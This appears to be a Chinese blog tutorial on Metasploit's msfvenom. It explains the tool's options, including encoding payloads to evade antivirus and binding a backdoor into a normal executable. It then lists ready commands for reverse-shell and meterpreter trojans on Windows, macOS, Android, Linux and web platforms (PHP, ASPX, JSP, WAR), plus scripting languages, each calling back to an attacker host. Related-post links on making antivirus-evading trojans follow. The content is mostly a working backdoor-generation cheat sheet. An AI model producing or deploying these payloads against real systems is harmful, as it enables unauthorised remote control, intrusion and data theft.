Kali中的 msfvenom 取代了msfpayload和msfencode,常用于生成后门木马

msfpayload是MSF攻击荷载生成器,用于生成shellcode和可执行代码。

msfencode是MSF编码器。

一 、msfvenom 常用参数

-l  列出指定模块的所有可用资源,模块类型包括: payloads, encoders, nops, all

-p 指定需要使用的payload(攻击荷载)。

-f 指定输出格式

Executable formats:Asp、aspx、aspx-exe、axis2、dll、elf、elf-so、exe、exe-only、exe-service、exe-smallhta-psh、jar、jsp、loop-vbs、macho、msi、msi-nouac、osx-app、psh、psh-cmd、psh-net、psh-reflection、python-reflection、vba、vba-exe、vba-psh、vbs、war;

Transform formats:base32、base64、bash、c、csharp、dw、dword、hex、java、js_be、js_le、num、perl、pl、powershell、ps1、py、python、raw、rb、ruby、sh、vbapplication、vbscript;

-e 指定需要使用的encoder(编码器)编码免杀。

-a 指定payload的目标架构

选择架构平台:x86 | x64 | x86_64

Platforms:windows, netware, android, java, ruby, linux, cisco, solaris, osx, bsd, openbsd, bsdi, netbsd, freebsd, aix, hpux, irix, unix, php, javascript, python, nodejs, firefox, mainframe

-o 保存payload文件输出。

-b 设定规避字符集,比如: '\x00\xff'避免使用的字符

-n 为payload预先指定一个NOP滑动长度

-s 设定有效攻击荷载的最大长度生成payload的最大长度,就是文件大小。

-i 指定payload的编码次数

-c 指定一个附加的win32 shellcode文件

-x 指定一个自定义的可执行文件作为模板

例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。

-k 保护模板程序的动作,注入的payload作为一个新的进程运行

例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。

-v 指定一个自定义的变量,以确定输出格式

二、各平台生成payload命令

Windows

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp

LHOST=192.168.3.33 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10  -f exe -o payload.exe

---

Mac

msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=192.168.3.33 LPORT=4444 -f macho -o payload.macho

---

Android

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4567  -o payload.apk

---

Powershell

msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=192.168.1.1 LPORT=8888 -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1

---

Linux

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f elf -o payload.elf

---

php

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.1  LPORT=8888  -f raw > shell.php

---

aspx

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=8888 -f aspx -o payload.aspx

---

JSP

msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=192.168.1.1  LPORT=4567 -f raw -o payload.jsp

---

war

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f raw - o payload.war

---

nodejs

msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.1.1  LPORT=4567 -f raw -o payload.js

---

python

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.1  LPORT=4567 -f raw -o payload.py

---

perl

msfvenom -p cmd/unix/reverse_perl LHOST=192.168.1.1  LPORT=4567 -f raw -o payload.pl

---

ruby

msfvenom -p ruby/shell_reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f raw -o payload.rb

---

lua

msfvenom -p cmd/unix/reverse_lua LHOST=192.168.1.1 LPORT=4567 -f raw -o payload.lua

---

windows shellcode

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f c

---

linux shellcode

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f c

---

mac shellcode

msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp  LHOST=192.168.1.1  LPORT=4567 -f c

---

msfvenom基本介绍相关推荐

  1. 利用msfvenom生成后门木马

    msfvenom工具介绍 msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload an ...

  2. Web渗透之MSF框架——msfvenom与免杀木马制作

    文章目录 生成常见的反向连接木马 反向连接的优势: Windows: Linux: MAC: PHP: Asp: Aspx: msfvenom参数介绍 生成免杀木马 360免杀木马 腾讯管家免杀木马 ...

  3. 【木马生成工具】Msfvenom介绍及利用

    Msfvenom介绍及利用 简介 msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayloa ...

  4. Msfvenom介绍及利用

    Msfvenom介绍及利用 简介: msfvenom a Metasploit standalone payload generator,Also a replacement for msfpaylo ...

  5. Metasploit 之生成木马(msfvenom)

    msfvenom参数 相关参数介绍 -p, --payload <payload> 指定需要使用的payload(攻击荷载) -l, --list [module_type] 列出指定模块 ...

  6. Windows自带渗透工具Certutil介绍(免杀、哈希计算、md5、sha256、下载文件、base64编码)

    目录 Certutil 环境 编码 解码 散列 下载 系统错误代码 使用Certutil进行渗透测试 提交恶意可执行文件 提交恶意 DLL 编码(免杀) 有效载荷可以被编码或加密,以避免被检测(免杀) ...

  7. metasploit怎么用? 进阶(msfvenom=payloads+encoders)篇 (゚益゚メ) 渗透测试

    文章目录 msfvenom介绍 生成攻击载荷 攻击载荷区分 常用攻击载荷生成语句 实际应用 无文件攻击 简单搭建靶场 攻击测试 msf常用命令 添加注册表(植入后门) 提升权限 清除记录 这边博客是接 ...

  8. metasploit基础命令介绍

    web安全学习了解:web渗透测试 官网:metasploit基础命令介绍 六个模块:   一.渗透攻击模块(exploit):利用发现的安全漏洞或配置弱点对远程目标系统进行攻击的代码 (1)主动渗透 ...

  9. Msfvenom编码免杀技术实现免杀实战

    Msfvenom编码免杀技术免杀实战 免杀技术在网络渗透的实战中十分实用,本文将介绍使用msfvenom自带编码免杀工具进行编码免杀,从而实现绕过杀毒软件获得shell的具体方法. 按照文中所讲述的方 ...

最新文章

  1. 专访网易云:数字企业九层之台,起于“全栈云”
  2. [BUUCTF]Reverse——[网鼎杯 2020 青龙组]jocker
  3. Python实现换位加密
  4. Ubuntu 14.04 AM335x TI-RTOS 编译
  5. mysql文件结构_MySQL文件结构
  6. sql分区表上创建索引_SQL Server中分区表和索引的选项
  7. POJ 3687 逆序拓扑
  8. 基于SSM的猫头鹰在线视频网站
  9. 初学者求经典java学习视频
  10. 安装Editplus软件
  11. 网络邻居计算机访问权限设置,网上邻居计算机拒绝访问
  12. talfta---动态故障树分析软件产品介绍
  13. winen中文_enWin使用部分中文字库
  14. 在一维的世界里寻找迭代次数的影子
  15. IT人才异军突起 有招网引领业界精英
  16. 制作文字水印图片、图片水印
  17. 联发科正式发布Helio P23/P30 SoC:GPU、基带大升级
  18. 【程序人生】1024 程序员节——闲言鹤语
  19. 关于计网的一点复习资料
  20. SQL Server 2005 SP3正式版下载

热门文章

  1. Laya Air游戏开发模式之MVC模式(核心篇)
  2. 淘宝店铺宝贝转化率该如何提升
  3. 安装网页书签收藏夹Shiori
  4. eclipse黑色主题黑色背景
  5. ChatGPT 账号被封?推荐 5 款国外网站,完美替代!
  6. FSSC22000认证咨询,本程序适用与食品安全体系中的产品危害信息收集、分析和评估等所有活动
  7. tcpdump的常用方法
  8. 基于STM32楼梯层控制系统
  9. python创建学生类姓名学号_定义一个学生类,包含学号、姓名、平时成绩和考核成绩四个数据成员和以下成员方法(用Python语言):...
  10. Musixtex写五线谱